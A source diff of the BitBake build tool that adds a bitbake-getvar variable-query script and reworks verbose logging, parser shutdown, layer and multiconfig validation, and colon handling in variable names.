@@ -0,0 +1,48 @@
1#! /usr/bin/env python3
2#
3# Copyright (C) 2021 Richard Purdie
4#
5# SPDX-License-Identifier: GPL-2.0-only
6#
7
8import argparse
9import io
10import os
11import sys
12
13bindir = os.path.dirname(__file__)
14topdir = os.path.dirname(bindir)
15sys.path[0:0] = [os.path.join(topdir, 'lib')]
16
17import bb.tinfoil
18
19if __name__ == "__main__":
20 parser = argparse.ArgumentParser(description="Bitbake Query Variable")
21 parser.add_argument("variable", help="variable name to query")
22 parser.add_argument("-r", "--recipe", help="Recipe name to query", default=None, required=False)
23 parser.add_argument('-u', '--unexpand', help='Do not expand the value (with --value)', action="store_true")
24 parser.add_argument('-f', '--flag', help='Specify a variable flag to query (with --value)', default=None)
25 parser.add_argument('--value', help='Only report the value, no history and no variable name', action="store_true")
26 args = parser.parse_args()
27
28 if args.unexpand and not args.value:
29 print("--unexpand only makes sense with --value")
30 sys.exit(1)
31
32 if args.flag and not args.value:
33 print("--flag only makes sense with --value")
34 sys.exit(1)
35
36 with bb.tinfoil.Tinfoil(tracking=True) as tinfoil:
37 if args.recipe:
38 tinfoil.prepare(quiet=2)
39 d = tinfoil.parse_recipe(args.recipe)
40 else:
41 tinfoil.prepare(quiet=2, config_only=True)
42 d = tinfoil.config_data
43 if args.flag:
44 print(str(d.getVarFlag(args.variable, args.flag, expand=(not args.unexpand))))
45 elif args.value:
46 print(str(d.getVar(args.variable, expand=(not args.unexpand))))
47 else:
48 bb.data.emit_var(args.variable, d=d, all=True)
diff --git a/bitbake/bin/bitbake-worker b/bitbake/bin/bitbake-worker
index 97cc0fd60f..e3ce01eec8 100755
--- a/bitbake/bin/bitbake-worker
+++ b/bitbake/bin/bitbake-worker
@@ -413,9 +413,9 @@ class BitbakeWorker(object):
413 413
414 def handle_workerdata(self, data): 414 def handle_workerdata(self, data):
415 self.workerdata = pickle.loads(data) 415 self.workerdata = pickle.loads(data)
416 bb.build.verboseShellLogging = self.workerdata["build_verbose_shell"]
417 bb.build.verboseStdoutLogging = self.workerdata["build_verbose_stdout"]
416 bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"] 418 bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"]
417 bb.msg.loggerDefaultVerbose = self.workerdata["logdefaultverbose"]
418 bb.msg.loggerVerboseLogs = self.workerdata["logdefaultverboselogs"]
419 bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"] 419 bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"]
420 for mc in self.databuilder.mcdata: 420 for mc in self.databuilder.mcdata:
421 self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"]) 421 self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"])
@@ -505,9 +505,11 @@ except BaseException as e:
505 import traceback 505 import traceback
506 sys.stderr.write(traceback.format_exc()) 506 sys.stderr.write(traceback.format_exc())
507 sys.stderr.write(str(e)) 507 sys.stderr.write(str(e))
508finally:
509 worker_thread_exit = True
510 worker_thread.join()
508 511
509worker_thread_exit = True 512workerlog_write("exiting")
510worker_thread.join() 513if not normalexit:
511 514 sys.exit(1)
512workerlog_write("exitting")
513sys.exit(0) 515sys.exit(0)
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
index 93ac18b78a..75e8dd69d9 100644
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
@@ -405,8 +405,8 @@ This fetcher supports the following parameters:
405 405
406- *"nobranch":* Tells the fetcher to not check the SHA validation for 406- *"nobranch":* Tells the fetcher to not check the SHA validation for
407 the branch when set to "1". The default is "0". Set this option for 407 the branch when set to "1". The default is "0". Set this option for
408 the recipe that refers to the commit that is valid for a tag instead 408 the recipe that refers to the commit that is valid for any namespace
409 of the branch. 409 (branch, tag, ...) instead of the branch.
410 410
411- *"bareclone":* Tells the fetcher to clone a bare clone into the 411- *"bareclone":* Tells the fetcher to clone a bare clone into the
412 destination directory without checking out a working tree. Only the 412 destination directory without checking out a working tree. Only the
diff --git a/bitbake/lib/bb/__init__.py b/bitbake/lib/bb/__init__.py
index b96466e654..ba8039497f 100644
--- a/bitbake/lib/bb/__init__.py
+++ b/bitbake/lib/bb/__init__.py
@@ -15,6 +15,13 @@ import sys
15if sys.version_info < (3, 5, 0): 15if sys.version_info < (3, 5, 0):
16 raise RuntimeError("Sorry, python 3.5.0 or later is required for this version of bitbake") 16 raise RuntimeError("Sorry, python 3.5.0 or later is required for this version of bitbake")
17 17
18if sys.version_info < (3, 10, 0):
19 # With python 3.8 and 3.9, we see errors of "libgcc_s.so.1 must be installed for pthread_cancel to work"
20 # https://stackoverflow.com/questions/64797838/libgcc-s-so-1-must-be-installed-for-pthread-cancel-to-work
21 # https://bugs.ams1.psf.io/issue42888
22 # so ensure libgcc_s is loaded early on
23 import ctypes
24 libgcc_s = ctypes.CDLL('libgcc_s.so.1')
18 25
19class BBHandledException(Exception): 26class BBHandledException(Exception):
20 """ 27 """
@@ -47,7 +54,7 @@ class BBLogger(Logger):
47 if not bb.event.worker_pid: 54 if not bb.event.worker_pid:
48 if self.name in bb.msg.loggerDefaultDomains and loglevel > (bb.msg.loggerDefaultDomains[self.name]): 55 if self.name in bb.msg.loggerDefaultDomains and loglevel > (bb.msg.loggerDefaultDomains[self.name]):
49 return 56 return
50 if loglevel > bb.msg.loggerDefaultLogLevel: 57 if loglevel < bb.msg.loggerDefaultLogLevel:
51 return 58 return
52 return self.log(loglevel, msg, *args, **kwargs) 59 return self.log(loglevel, msg, *args, **kwargs)
53 60
diff --git a/bitbake/lib/bb/build.py b/bitbake/lib/bb/build.py
index 23b6ee455f..aaada8a18b 100644
--- a/bitbake/lib/bb/build.py
+++ b/bitbake/lib/bb/build.py
@@ -27,6 +27,9 @@ from bb import data, event, utils
27bblogger = logging.getLogger('BitBake') 27bblogger = logging.getLogger('BitBake')
28logger = logging.getLogger('BitBake.Build') 28logger = logging.getLogger('BitBake.Build')
29 29
30verboseShellLogging = False
31verboseStdoutLogging = False
32
30__mtime_cache = {} 33__mtime_cache = {}
31 34
32def cached_mtime_noerror(f): 35def cached_mtime_noerror(f):
@@ -290,8 +293,8 @@ def exec_func_python(func, d, runfile, cwd=None):
290 lineno = int(d.getVarFlag(func, "lineno", False)) 293 lineno = int(d.getVarFlag(func, "lineno", False))
291 bb.methodpool.insert_method(func, text, fn, lineno - 1) 294 bb.methodpool.insert_method(func, text, fn, lineno - 1)
292 295
293 comp = utils.better_compile(code, func, "exec_python_func() autogenerated") 296 comp = utils.better_compile(code, func, "exec_func_python() autogenerated")
294 utils.better_exec(comp, {"d": d}, code, "exec_python_func() autogenerated") 297 utils.better_exec(comp, {"d": d}, code, "exec_func_python() autogenerated")
295 finally: 298 finally:
296 bb.debug(2, "Python function %s finished" % func) 299 bb.debug(2, "Python function %s finished" % func)
297 300
@@ -371,7 +374,7 @@ def exec_func_shell(func, d, runfile, cwd=None):
371 374
372 bb.data.emit_func(func, script, d) 375 bb.data.emit_func(func, script, d)
373 376
374 if bb.msg.loggerVerboseLogs: 377 if verboseShellLogging or bb.utils.to_boolean(d.getVar("BB_VERBOSE_LOGS", False)):
375 script.write("set -x\n") 378 script.write("set -x\n")
376 if cwd: 379 if cwd:
377 script.write("cd '%s'\n" % cwd) 380 script.write("cd '%s'\n" % cwd)
@@ -391,7 +394,7 @@ exit $ret
391 if fakerootcmd: 394 if fakerootcmd:
392 cmd = [fakerootcmd, runfile] 395 cmd = [fakerootcmd, runfile]
393 396
394 if bb.msg.loggerDefaultVerbose: 397 if verboseStdoutLogging:
395 logfile = LogTee(logger, StdoutNoopContextManager()) 398 logfile = LogTee(logger, StdoutNoopContextManager())
396 else: 399 else:
397 logfile = StdoutNoopContextManager() 400 logfile = StdoutNoopContextManager()
@@ -587,11 +590,15 @@ def _exec_task(fn, task, d, quieterr):
587 except bb.BBHandledException: 590 except bb.BBHandledException:
588 event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata) 591 event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata)
589 return 1 592 return 1
590 except Exception as exc: 593 except (Exception, SystemExit) as exc:
591 if quieterr: 594 if quieterr:
592 event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata) 595 event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata)
593 else: 596 else:
594 errprinted = errchk.triggered 597 errprinted = errchk.triggered
598 # If the output is already on stdout, we've printed the information in the
599 # logs once already so don't duplicate
600 if verboseStdoutLogging:
601 errprinted = True
595 logger.error(str(exc)) 602 logger.error(str(exc))
596 event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata) 603 event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata)
597 return 1 604 return 1
@@ -901,6 +908,8 @@ def tasksbetween(task_start, task_end, d):
901 def follow_chain(task, endtask, chain=None): 908 def follow_chain(task, endtask, chain=None):
902 if not chain: 909 if not chain:
903 chain = [] 910 chain = []
911 if task in chain:
912 bb.fatal("Circular task dependencies as %s depends on itself via the chain %s" % (task, " -> ".join(chain)))
904 chain.append(task) 913 chain.append(task)
905 for othertask in tasks: 914 for othertask in tasks:
906 if othertask == task: 915 if othertask == task:
diff --git a/bitbake/lib/bb/command.py b/bitbake/lib/bb/command.py
index 6abf38668b..b8429b2773 100644
--- a/bitbake/lib/bb/command.py
+++ b/bitbake/lib/bb/command.py
@@ -20,6 +20,7 @@ Commands are queued in a CommandQueue
20 20
21from collections import OrderedDict, defaultdict 21from collections import OrderedDict, defaultdict
22 22
23import io
23import bb.event 24import bb.event
24import bb.cooker 25import bb.cooker
25import bb.remotedata 26import bb.remotedata
@@ -74,8 +75,12 @@ class Command:
74 result = command_method(self, commandline) 75 result = command_method(self, commandline)
75 except CommandError as exc: 76 except CommandError as exc:
76 return None, exc.args[0] 77 return None, exc.args[0]
77 except (Exception, SystemExit): 78 except (Exception, SystemExit) as exc:
78 import traceback 79 import traceback
80 if isinstance(exc, bb.BBHandledException):
81 # We need to start returning real exceptions here. Until we do, we can't
82 # tell if an exception is an instance of bb.BBHandledException
83 return None, "bb.BBHandledException()\n" + traceback.format_exc()
79 return None, traceback.format_exc() 84 return None, traceback.format_exc()
80 else: 85 else:
81 return result, None 86 return result, None
@@ -474,6 +479,17 @@ class CommandsSync:
474 d = command.remotedatastores[dsindex].varhistory 479 d = command.remotedatastores[dsindex].varhistory
475 return getattr(d, method)(*args, **kwargs) 480 return getattr(d, method)(*args, **kwargs)
476 481
482 def dataStoreConnectorVarHistCmdEmit(self, command, params):
483 dsindex = params[0]
484 var = params[1]
485 oval = params[2]
486 val = params[3]
487 d = command.remotedatastores[params[4]]
488
489 o = io.StringIO()
490 command.remotedatastores[dsindex].varhistory.emit(var, oval, val, o, d)
491 return o.getvalue()
492
477 def dataStoreConnectorIncHistCmd(self, command, params): 493 def dataStoreConnectorIncHistCmd(self, command, params):
478 dsindex = params[0] 494 dsindex = params[0]
479 method = params[1] 495 method = params[1]
@@ -620,6 +636,16 @@ class CommandsAsync:
620 command.finishAsyncCommand() 636 command.finishAsyncCommand()
621 findFilesMatchingInDir.needcache = False 637 findFilesMatchingInDir.needcache = False
622 638
639 def testCookerCommandEvent(self, command, params):
640 """
641 Dummy command used by OEQA selftest to test tinfoil without IO
642 """
643 pattern = params[0]
644
645 command.cooker.testCookerCommandEvent(pattern)
646 command.finishAsyncCommand()
647 testCookerCommandEvent.needcache = False
648
623 def findConfigFilePath(self, command, params): 649 def findConfigFilePath(self, command, params):
624 """ 650 """
625 Find the path of the requested configuration file 651 Find the path of the requested configuration file
diff --git a/bitbake/lib/bb/compat.py b/bitbake/lib/bb/compat.py
deleted file mode 100644
index 49356681ab..0000000000
--- a/bitbake/lib/bb/compat.py
+++ /dev/null
@@ -1,10 +0,0 @@
1#
2# SPDX-License-Identifier: GPL-2.0-only
3#
4
5"""Code pulled from future python versions, here for compatibility"""
6
7from collections import MutableMapping, KeysView, ValuesView, ItemsView, OrderedDict
8from functools import total_ordering
9
10
diff --git a/bitbake/lib/bb/cooker.py b/bitbake/lib/bb/cooker.py
index d90bd3945f..6743bce585 100644
--- a/bitbake/lib/bb/cooker.py
+++ b/bitbake/lib/bb/cooker.py
@@ -13,7 +13,6 @@ import sys, os, glob, os.path, re, time
13import itertools 13import itertools
14import logging 14import logging
15import multiprocessing 15import multiprocessing
16import sre_constants
17import threading 16import threading
18from io import StringIO, UnsupportedOperation 17from io import StringIO, UnsupportedOperation
19from contextlib import closing 18from contextlib import closing
@@ -411,10 +410,7 @@ class BBCooker:
411 self.data.disableTracking() 410 self.data.disableTracking()
412 411
413 def parseConfiguration(self): 412 def parseConfiguration(self):
414 # Set log file verbosity 413 self.updateCacheSync()
415 verboselogs = bb.utils.to_boolean(self.data.getVar("BB_VERBOSE_LOGS", False))
416 if verboselogs:
417 bb.msg.loggerVerboseLogs = True
418 414
419 # Change nice level if we're asked to 415 # Change nice level if we're asked to
420 nice = self.data.getVar("BB_NICE_LEVEL") 416 nice = self.data.getVar("BB_NICE_LEVEL")
@@ -1022,6 +1018,11 @@ class BBCooker:
1022 if matches: 1018 if matches:
1023 bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data) 1019 bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
1024 1020
1021 def testCookerCommandEvent(self, filepattern):
1022 # Dummy command used by OEQA selftest to test tinfoil without IO
1023 matches = ["A", "B"]
1024 bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
1025
1025 def findProviders(self, mc=''): 1026 def findProviders(self, mc=''):
1026 return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn) 1027 return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn)
1027 1028
@@ -1636,6 +1637,7 @@ class BBCooker:
1636 return 1637 return
1637 1638
1638 def post_serve(self): 1639 def post_serve(self):
1640 self.shutdown(force=True)
1639 prserv.serv.auto_shutdown() 1641 prserv.serv.auto_shutdown()
1640 if self.hashserv: 1642 if self.hashserv:
1641 self.hashserv.process.terminate() 1643 self.hashserv.process.terminate()
@@ -1650,6 +1652,7 @@ class BBCooker:
1650 1652
1651 if self.parser: 1653 if self.parser:
1652 self.parser.shutdown(clean=not force, force=force) 1654 self.parser.shutdown(clean=not force, force=force)
1655 self.parser.final_cleanup()
1653 1656
1654 def finishcommand(self): 1657 def finishcommand(self):
1655 self.state = state.initial 1658 self.state = state.initial
@@ -1791,7 +1794,7 @@ class CookerCollectFiles(object):
1791 try: 1794 try:
1792 re.compile(mask) 1795 re.compile(mask)
1793 bbmasks.append(mask) 1796 bbmasks.append(mask)
1794 except sre_constants.error: 1797 except re.error:
1795 collectlog.critical("BBMASK contains an invalid regular expression, ignoring: %s" % mask) 1798 collectlog.critical("BBMASK contains an invalid regular expression, ignoring: %s" % mask)
1796 1799
1797 # Then validate the combined regular expressions. This should never 1800 # Then validate the combined regular expressions. This should never
@@ -1799,7 +1802,7 @@ class CookerCollectFiles(object):
1799 bbmask = "|".join(bbmasks) 1802 bbmask = "|".join(bbmasks)
1800 try: 1803 try:
1801 bbmask_compiled = re.compile(bbmask) 1804 bbmask_compiled = re.compile(bbmask)
1802 except sre_constants.error: 1805 except re.error:
1803 collectlog.critical("BBMASK is not a valid regular expression, ignoring: %s" % bbmask) 1806 collectlog.critical("BBMASK is not a valid regular expression, ignoring: %s" % bbmask)
1804 bbmask = None 1807 bbmask = None
1805 1808
@@ -1931,7 +1934,8 @@ class Parser(multiprocessing.Process):
1931 except queue.Empty: 1934 except queue.Empty:
1932 pass 1935 pass
1933 else: 1936 else:
1934 self.results.cancel_join_thread() 1937 self.results.close()
1938 self.results.join_thread()
1935 break 1939 break
1936 1940
1937 if pending: 1941 if pending:
@@ -1940,6 +1944,8 @@ class Parser(multiprocessing.Process):
1940 try: 1944 try:
1941 job = self.jobs.pop() 1945 job = self.jobs.pop()
1942 except IndexError: 1946 except IndexError:
1947 self.results.close()
1948 self.results.join_thread()
1943 break 1949 break
1944 result = self.parse(*job) 1950 result = self.parse(*job)
1945 # Clear the siggen cache after parsing to control memory usage, its huge 1951 # Clear the siggen cache after parsing to control memory usage, its huge
@@ -2015,6 +2021,7 @@ class CookerParser(object):
2015 2021
2016 self.start() 2022 self.start()
2017 self.haveshutdown = False 2023 self.haveshutdown = False
2024 self.syncthread = None
2018 2025
2019 def start(self): 2026 def start(self):
2020 self.results = self.load_cached() 2027 self.results = self.load_cached()
@@ -2056,12 +2063,9 @@ class CookerParser(object):
2056 self.total) 2063 self.total)
2057 2064
2058 bb.event.fire(event, self.cfgdata) 2065 bb.event.fire(event, self.cfgdata)
2059 for process in self.processes: 2066
2060 self.parser_quit.put(None) 2067 for process in self.processes:
2061 else: 2068 self.parser_quit.put(None)
2062 self.parser_quit.cancel_join_thread()
2063 for process in self.processes:
2064 self.parser_quit.put(None)
2065 2069
2066 # Cleanup the queue before call process.join(), otherwise there might be 2070 # Cleanup the queue before call process.join(), otherwise there might be
2067 # deadlocks. 2071 # deadlocks.
@@ -2078,9 +2082,13 @@ class CookerParser(object):
2078 else: 2082 else:
2079 process.join() 2083 process.join()
2080 2084
2085 self.parser_quit.close()
2086 # Allow data left in the cancel queue to be discarded
2087 self.parser_quit.cancel_join_thread()
2088
2081 sync = threading.Thread(target=self.bb_cache.sync) 2089 sync = threading.Thread(target=self.bb_cache.sync)
2090 self.syncthread = sync
2082 sync.start() 2091 sync.start()
2083 multiprocessing.util.Finalize(None, sync.join, exitpriority=-100)
2084 bb.codeparser.parser_cache_savemerge() 2092 bb.codeparser.parser_cache_savemerge()
2085 bb.fetch.fetcher_parse_done() 2093 bb.fetch.fetcher_parse_done()
2086 if self.cooker.configuration.profile: 2094 if self.cooker.configuration.profile:
@@ -2094,6 +2102,10 @@ class CookerParser(object):
2094 bb.utils.process_profilelog(profiles, pout = pout) 2102 bb.utils.process_profilelog(profiles, pout = pout)
2095 print("Processed parsing statistics saved to %s" % (pout)) 2103 print("Processed parsing statistics saved to %s" % (pout))
2096 2104
2105 def final_cleanup(self):
2106 if self.syncthread:
2107 self.syncthread.join()
2108
2097 def load_cached(self): 2109 def load_cached(self):
2098 for filename, appends in self.fromcache: 2110 for filename, appends in self.fromcache:
2099 cached, infos = self.bb_cache.load(filename, appends) 2111 cached, infos = self.bb_cache.load(filename, appends)
@@ -2126,18 +2138,18 @@ class CookerParser(object):
2126 except bb.BBHandledException as exc: 2138 except bb.BBHandledException as exc:
2127 self.error += 1 2139 self.error += 1
2128 logger.error('Failed to parse recipe: %s' % exc.recipe) 2140 logger.error('Failed to parse recipe: %s' % exc.recipe)
2129 self.shutdown(clean=False) 2141 self.shutdown(clean=False, force=True)
2130 return False 2142 return False
2131 except ParsingFailure as exc: 2143 except ParsingFailure as exc:
2132 self.error += 1 2144 self.error += 1
2133 logger.error('Unable to parse %s: %s' % 2145 logger.error('Unable to parse %s: %s' %
2134 (exc.recipe, bb.exceptions.to_string(exc.realexception))) 2146 (exc.recipe, bb.exceptions.to_string(exc.realexception)))
2135 self.shutdown(clean=False) 2147 self.shutdown(clean=False, force=True)
2136 return False 2148 return False
2137 except bb.parse.ParseError as exc: 2149 except bb.parse.ParseError as exc:
2138 self.error += 1 2150 self.error += 1
2139 logger.error(str(exc)) 2151 logger.error(str(exc))
2140 self.shutdown(clean=False) 2152 self.shutdown(clean=False, force=True)
2141 return False 2153 return False
2142 except bb.data_smart.ExpansionError as exc: 2154 except bb.data_smart.ExpansionError as exc:
2143 self.error += 1 2155 self.error += 1
@@ -2146,7 +2158,7 @@ class CookerParser(object):
2146 tb = list(itertools.dropwhile(lambda e: e.filename.startswith(bbdir), exc.traceback)) 2158 tb = list(itertools.dropwhile(lambda e: e.filename.startswith(bbdir), exc.traceback))
2147 logger.error('ExpansionError during parsing %s', value.recipe, 2159 logger.error('ExpansionError during parsing %s', value.recipe,
2148 exc_info=(etype, value, tb)) 2160 exc_info=(etype, value, tb))
2149 self.shutdown(clean=False) 2161 self.shutdown(clean=False, force=True)
2150 return False 2162 return False
2151 except Exception as exc: 2163 except Exception as exc:
2152 self.error += 1 2164 self.error += 1
@@ -2158,7 +2170,7 @@ class CookerParser(object):
2158 # Most likely, an exception occurred during raising an exception 2170 # Most likely, an exception occurred during raising an exception
2159 import traceback 2171 import traceback
2160 logger.error('Exception during parse: %s' % traceback.format_exc()) 2172 logger.error('Exception during parse: %s' % traceback.format_exc())
2161 self.shutdown(clean=False) 2173 self.shutdown(clean=False, force=True)
2162 return False 2174 return False
2163 2175
2164 self.current += 1 2176 self.current += 1
diff --git a/bitbake/lib/bb/cookerdata.py b/bitbake/lib/bb/cookerdata.py
index 472423fdc8..30727bf2ee 100644
--- a/bitbake/lib/bb/cookerdata.py
+++ b/bitbake/lib/bb/cookerdata.py
@@ -58,11 +58,14 @@ class ConfigParameters(object):
58 def updateToServer(self, server, environment): 58 def updateToServer(self, server, environment):
59 options = {} 59 options = {}
60 for o in ["abort", "force", "invalidate_stamp", 60 for o in ["abort", "force", "invalidate_stamp",
61 "verbose", "debug", "dry_run", "dump_signatures", 61 "debug", "dry_run", "dump_signatures",
62 "debug_domains", "extra_assume_provided", "profile", 62 "debug_domains", "extra_assume_provided", "profile",
63 "prefile", "postfile", "server_timeout"]: 63 "prefile", "postfile", "server_timeout"]:
64 options[o] = getattr(self.options, o) 64 options[o] = getattr(self.options, o)
65 65
66 options['build_verbose_shell'] = self.options.verbose
67 options['build_verbose_stdout'] = self.options.verbose
68
66 ret, error = server.runCommand(["updateConfig", options, environment, sys.argv]) 69 ret, error = server.runCommand(["updateConfig", options, environment, sys.argv])
67 if error: 70 if error:
68 raise Exception("Unable to update the server configuration with local parameters: %s" % error) 71 raise Exception("Unable to update the server configuration with local parameters: %s" % error)
@@ -125,6 +128,8 @@ class CookerConfiguration(object):
125 self.skipsetscene = False 128 self.skipsetscene = False
126 self.invalidate_stamp = False 129 self.invalidate_stamp = False
127 self.dump_signatures = [] 130 self.dump_signatures = []
131 self.build_verbose_shell = False
132 self.build_verbose_stdout = False
128 self.dry_run = False 133 self.dry_run = False
129 self.tracking = False 134 self.tracking = False
130 self.xmlrpcinterface = [] 135 self.xmlrpcinterface = []
@@ -297,6 +302,8 @@ class CookerDataBuilder(object):
297 302
298 multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split() 303 multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split()
299 for config in multiconfig: 304 for config in multiconfig:
305 if config[0].isdigit():
306 bb.fatal("Multiconfig name '%s' is invalid as multiconfigs cannot start with a digit" % config)
300 mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config) 307 mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config)
301 bb.event.fire(bb.event.ConfigParsed(), mcdata) 308 bb.event.fire(bb.event.ConfigParsed(), mcdata)
302 self.mcdata[config] = mcdata 309 self.mcdata[config] = mcdata
@@ -348,6 +355,9 @@ class CookerDataBuilder(object):
348 layers = (data.getVar('BBLAYERS') or "").split() 355 layers = (data.getVar('BBLAYERS') or "").split()
349 broken_layers = [] 356 broken_layers = []
350 357
358 if not layers:
359 bb.fatal("The bblayers.conf file doesn't contain any BBLAYERS definition")
360
351 data = bb.data.createCopy(data) 361 data = bb.data.createCopy(data)
352 approved = bb.utils.approved_variables() 362 approved = bb.utils.approved_variables()
353 363
@@ -399,6 +409,8 @@ class CookerDataBuilder(object):
399 if c in collections_tmp: 409 if c in collections_tmp:
400 bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c) 410 bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c)
401 compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split()) 411 compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split())
412 if compat and not layerseries:
413 bb.fatal("No core layer found to work with layer '%s'. Missing entry in bblayers.conf?" % c)
402 if compat and not (compat & layerseries): 414 if compat and not (compat & layerseries):
403 bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)" 415 bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)"
404 % (c, " ".join(layerseries), " ".join(compat))) 416 % (c, " ".join(layerseries), " ".join(compat)))
diff --git a/bitbake/lib/bb/data.py b/bitbake/lib/bb/data.py
index b0683c5180..1d21e00a1c 100644
--- a/bitbake/lib/bb/data.py
+++ b/bitbake/lib/bb/data.py
@@ -301,6 +301,7 @@ def build_dependencies(key, keys, shelldeps, varflagsexcl, d):
301 value += "\n_remove of %s" % r 301 value += "\n_remove of %s" % r
302 deps |= r2.references 302 deps |= r2.references
303 deps = deps | (keys & r2.execs) 303 deps = deps | (keys & r2.execs)
304 value = handle_contains(value, r2.contains, d)
304 return value 305 return value
305 306
306 if "vardepvalue" in varflags: 307 if "vardepvalue" in varflags:
diff --git a/bitbake/lib/bb/data_smart.py b/bitbake/lib/bb/data_smart.py
index 1d8774ee5e..c46d3f0a08 100644
--- a/bitbake/lib/bb/data_smart.py
+++ b/bitbake/lib/bb/data_smart.py
@@ -17,7 +17,7 @@ BitBake build tools.
17# Based on functions from the base bb module, Copyright 2003 Holger Schurig 17# Based on functions from the base bb module, Copyright 2003 Holger Schurig
18 18
19import copy, re, sys, traceback 19import copy, re, sys, traceback
20from collections import MutableMapping 20from collections.abc import MutableMapping
21import logging 21import logging
22import hashlib 22import hashlib
23import bb, bb.codeparser 23import bb, bb.codeparser
@@ -28,7 +28,7 @@ logger = logging.getLogger("BitBake.Data")
28 28
29__setvar_keyword__ = ["_append", "_prepend", "_remove"] 29__setvar_keyword__ = ["_append", "_prepend", "_remove"]
30__setvar_regexp__ = re.compile(r'(?P<base>.*?)(?P<keyword>_append|_prepend|_remove)(_(?P<add>[^A-Z]*))?$') 30__setvar_regexp__ = re.compile(r'(?P<base>.*?)(?P<keyword>_append|_prepend|_remove)(_(?P<add>[^A-Z]*))?$')
31__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~]+?}") 31__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~:]+?}")
32__expand_python_regexp__ = re.compile(r"\${@.+?}") 32__expand_python_regexp__ = re.compile(r"\${@.+?}")
33__whitespace_split__ = re.compile(r'(\s)') 33__whitespace_split__ = re.compile(r'(\s)')
34__override_regexp__ = re.compile(r'[a-z0-9]+') 34__override_regexp__ = re.compile(r'[a-z0-9]+')
@@ -403,7 +403,7 @@ class DataSmart(MutableMapping):
403 s = __expand_python_regexp__.sub(varparse.python_sub, s) 403 s = __expand_python_regexp__.sub(varparse.python_sub, s)
404 except SyntaxError as e: 404 except SyntaxError as e:
405 # Likely unmatched brackets, just don't expand the expression 405 # Likely unmatched brackets, just don't expand the expression
406 if e.msg != "EOL while scanning string literal": 406 if e.msg != "EOL while scanning string literal" and not e.msg.startswith("unterminated string literal"):
407 raise 407 raise
408 if s == olds: 408 if s == olds:
409 break 409 break
@@ -411,6 +411,8 @@ class DataSmart(MutableMapping):
411 raise 411 raise
412 except bb.parse.SkipRecipe: 412 except bb.parse.SkipRecipe:
413 raise 413 raise
414 except bb.BBHandledException:
415 raise
414 except Exception as exc: 416 except Exception as exc:
415 tb = sys.exc_info()[2] 417 tb = sys.exc_info()[2]
416 raise ExpansionError(varname, s, exc).with_traceback(tb) from exc 418 raise ExpansionError(varname, s, exc).with_traceback(tb) from exc
@@ -481,6 +483,7 @@ class DataSmart(MutableMapping):
481 483
482 def setVar(self, var, value, **loginfo): 484 def setVar(self, var, value, **loginfo):
483 #print("var=" + str(var) + " val=" + str(value)) 485 #print("var=" + str(var) + " val=" + str(value))
486 var = var.replace(":", "_")
484 self.expand_cache = {} 487 self.expand_cache = {}
485 parsing=False 488 parsing=False
486 if 'parsing' in loginfo: 489 if 'parsing' in loginfo:
@@ -589,6 +592,8 @@ class DataSmart(MutableMapping):
589 """ 592 """
590 Rename the variable key to newkey 593 Rename the variable key to newkey
591 """ 594 """
595 key = key.replace(":", "_")
596 newkey = newkey.replace(":", "_")
592 if key == newkey: 597 if key == newkey:
593 bb.warn("Calling renameVar with equivalent keys (%s) is invalid" % key) 598 bb.warn("Calling renameVar with equivalent keys (%s) is invalid" % key)
594 return 599 return
@@ -637,6 +642,7 @@ class DataSmart(MutableMapping):
637 self.setVar(var + "_prepend", value, ignore=True, parsing=True) 642 self.setVar(var + "_prepend", value, ignore=True, parsing=True)
638 643
639 def delVar(self, var, **loginfo): 644 def delVar(self, var, **loginfo):
645 var = var.replace(":", "_")
640 self.expand_cache = {} 646 self.expand_cache = {}
641 647
642 loginfo['detail'] = "" 648 loginfo['detail'] = ""
@@ -664,6 +670,7 @@ class DataSmart(MutableMapping):
664 override = None 670 override = None
665 671
666 def setVarFlag(self, var, flag, value, **loginfo): 672 def setVarFlag(self, var, flag, value, **loginfo):
673 var = var.replace(":", "_")
667 self.expand_cache = {} 674 self.expand_cache = {}
668 675
669 if 'op' not in loginfo: 676 if 'op' not in loginfo:
@@ -687,6 +694,7 @@ class DataSmart(MutableMapping):
687 self.dict["__exportlist"]["_content"].add(var) 694 self.dict["__exportlist"]["_content"].add(var)
688 695
689 def getVarFlag(self, var, flag, expand=True, noweakdefault=False, parsing=False, retparser=False): 696 def getVarFlag(self, var, flag, expand=True, noweakdefault=False, parsing=False, retparser=False):
697 var = var.replace(":", "_")
690 if flag == "_content": 698 if flag == "_content":
